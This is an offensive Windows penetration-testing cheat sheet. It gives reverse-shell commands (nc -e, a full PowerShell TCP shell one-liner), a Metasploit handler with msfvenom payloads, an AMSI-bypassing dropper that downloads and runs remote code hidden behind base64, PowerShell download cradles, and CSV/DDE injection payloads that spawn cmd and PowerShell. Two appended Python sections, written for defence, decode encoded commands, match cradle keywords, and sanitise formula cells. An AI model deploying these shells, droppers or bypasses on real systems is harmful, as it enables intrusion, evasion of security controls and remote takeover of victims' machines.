Reverse Shell

nc

nc.exe <ip> <port> -e cmd.exe

Unicorn

python unicorn.py windows/meterpreter/reverse_https <ip> <port>

PowerShell

64-bit process (the Sysnative path launches the 64-bit PowerShell from a 32-bit process)

c:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell "IEX(New-Object Net.WebClient).downloadstring('http://<ip>/<shell.ps1>')"
/usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1
$client = New-Object System.Net.Sockets.TCPClient("<ip>",<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Bypass Windows Defender / AMSI + system proxy credentials (28/06/2018)

HANDLER RC FILE

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST 0.0.0.0
set LPORT 443
set LURI /api/callback
set ExitOnSession false

PAYLOADS

msfvenom -p windows/x64/meterpreter/reverse_https lhost=<ip/domain> lport=443 luri=/api/callback -e x64/xor -f psh-net -o payload.pshnet
python -m SimpleHTTPServer 80

DROPPER BUILD

Encoding dropper with https://gchq.github.io/CyberChef/

Recipe: Encode text (UTF-16LE (1200)) -> To Base64
Input:
$mem=[System.Runtime.InteropServices.Marshal]::AllocHGlobal(9076);[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiSession','NonPublic,Static').SetValue($null, $null);[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiContext','NonPublic,Static').SetValue($null, [IntPtr]$mem);[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$e=new-object net.webclient;$e.proxy=[Net.WebRequest]::GetSystemWebProxy();$e.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $e.downloadstring('http://<ip/domain>/payload.pshnet')

Encoding dropper with PowerShell

B64 Encoding:
$Base64 = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes([System.IO.File]::ReadAllText("C:\Users\<..>\amsi-bypass.ps1")))
Write-Output $Base64| Out-File "payload-b64"

B64 Decoding:
$bytes = [Convert]::FromBase64String($Base64)
[IO.File]::WriteAllBytes("C:\Users\<..>\payload-b64-decoded", $bytes)

FINAL DROPPER

powershell.exe -NoP -NonI -W Hidden -e <base64_cyberchef>

CSV injection

PoC
=cmd|' /c calc'!A1
=cmd|'/c REM.&&@p^o^w^e^r^s^h^e^l^l c:/*/*2/?al?.?x?"'!_xlbgnm.A1

Use domain names rather than raw IPs if possible.
For PowerShell's -e (-EncodedCommand) the base64 conversion must be done on Unicode (UTF-16LE) text (see below).

Short + bypass Defender + B64 conversion (Unicode) (04/06/2018)
$Base64 = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes([System.IO.File]::ReadAllText("C:\Users\rsh.ps1")))
Write-Output $Base64 |  Out-File -FilePath "C:\Users\rsh.b64"

Content of file f (paste the base64 string from C:\Users\rsh.b64 in place of the placeholder):
powershell -e <C:\Users\rsh.b64>

powershell "wget 192.168.1.1/f|iex"
Alternative: DownloadString
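Added example (not part of the original notes, written from the detection side): a small Python helper that shows the UTF-16LE requirement the conversion above relies on, decodes a -e / -EncodedCommand argument found in a process command line, and matches the decoded script (or the raw command line when nothing is encoded) against keywords typical of download cradles and AMSI tampering. The sample script and command line are constructed here and point at a reserved example host; the keyword list is illustrative, not a complete detection rule.

```python
import base64
import re

# Substrings typical of download cradles and AMSI tampering in PowerShell
# payloads (illustrative list, not a complete detection rule).
SUSPICIOUS = ("iex", "invoke-expression", "downloadstring", "net.webclient",
              "amsiutils", "frombase64string")

# powershell -e / -EncodedCommand takes base64 of the script's UTF-16LE bytes.
_ENC_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def encode_command(script: str, encoding: str = "utf-16-le") -> str:
    """Base64 the way -e expects it (UTF-16LE). The encoding parameter exists only
    so the mis-encoded (UTF-8) case can be demonstrated; PowerShell wants UTF-16LE."""
    return base64.b64encode(script.encode(encoding)).decode("ascii")


def decode_encoded_command(b64: str):
    """Inverse of encode_command. Returns None when the argument is not valid
    base64 or does not decode as UTF-16LE (e.g. an odd byte count)."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def inspect_cmdline(cmdline: str) -> dict:
    """Decode a -e argument if present, then match keywords against the decoded
    script, or against the raw command line when nothing is encoded."""
    m = _ENC_FLAG.search(cmdline)
    script = decode_encoded_command(m.group(1)) if m else None
    haystack = (script if script is not None else cmdline).lower()
    hits = [k for k in SUSPICIOUS if k in haystack]
    return {"encoded": m is not None, "script": script, "hits": hits}


# Constructed sample: a download cradle wrapped the way the dropper line above is built.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/f.ps1')"
SAMPLE_CMDLINE = "powershell.exe -NoP -NonI -W Hidden -e " + encode_command(SAMPLE_SCRIPT)

if __name__ == "__main__":
    print(inspect_cmdline(SAMPLE_CMDLINE))
    # The same script base64'd from UTF-8 does not survive a UTF-16LE decode,
    # which is why the conversion above has to use Unicode.
    print(decode_encoded_command(encode_command(SAMPLE_SCRIPT, "utf-8")) == SAMPLE_SCRIPT)
```

Feed inspect_cmdline the CommandLine field from process-creation events (Sysmon event 1, Windows 4688 with command-line auditing) to surface both the plain IEX cradles and the -e dropper form; a miss on decode (None) with an encoded flag present is itself worth flagging.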

Use a doubled single quote ('') to escape a single quote inside a PowerShell IEX payload (even if base64-encoded)

=cmd|'/c powershell.exe -command iex (new-object Net.WebClient).DownloadString(''http://<ip/domain>/f.ps1'')'!_A1
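Added example (not from the original page, written from the defender's side) for the CSV injection payloads above, including the quoted variant here: Python that flags cells a spreadsheet would evaluate as formulas (leading =, +, -, @, tab or CR, which also catches the cmd| DDE form since it starts with =) and neutralises them by prefixing a single quote when the file is written back out. The sample CSV is constructed for the example; the trigger list follows the commonly published CSV-injection guidance (OWASP).

```python
import csv
import io

# Leading characters that make Excel / LibreOffice evaluate a cell instead of
# storing it as text (follows the commonly published CSV-injection guidance).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_like(cell: str) -> bool:
    """True when the cell would be interpreted as a formula; this also covers the
    =cmd|'...'!A1 DDE form, since it starts with '='."""
    return cell.startswith(FORMULA_TRIGGERS)


def neutralise_cell(cell: str) -> str:
    """Prefix a single quote so the spreadsheet stores the value as text.
    Double quotes inside the value are escaped by the CSV writer below."""
    return "'" + cell if is_formula_like(cell) else cell


def scan_csv(text: str):
    """Return (row, column, value) for every formula-like cell; rows/cols are 1-based."""
    findings = []
    for r, row in enumerate(csv.reader(io.StringIO(text)), start=1):
        for c, cell in enumerate(row, start=1):
            if is_formula_like(cell):
                findings.append((r, c, cell))
    return findings


def sanitise_csv(text: str) -> str:
    """Rewrite the CSV with every cell neutralised and quoted."""
    out = io.StringIO()
    writer = csv.writer(out, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in csv.reader(io.StringIO(text)):
        writer.writerow([neutralise_cell(cell) for cell in row])
    return out.getvalue()


# Constructed sample export: one benign row, the DDE PoC from above, and two
# other formula-like values that a naive "starts with =" check would miss.
SAMPLE_CSV = (
    "name,comment\n"
    "alice,looks fine\n"
    "bob,\"=cmd|' /c calc'!A1\"\n"
    "carol,-2+3\n"
    "dave,@SUM(1;2)\n"
)

if __name__ == "__main__":
    for finding in scan_csv(SAMPLE_CSV):
        print("formula-like cell at row %d col %d: %r" % finding)
    print(sanitise_csv(SAMPLE_CSV))
```

Apply neutralise_cell at the point where untrusted values enter an export, not just when scanning files afterwards; note that the prefixed apostrophe may be displayed as part of the value in some spreadsheet applications, which is the accepted trade-off for not having the cell evaluated.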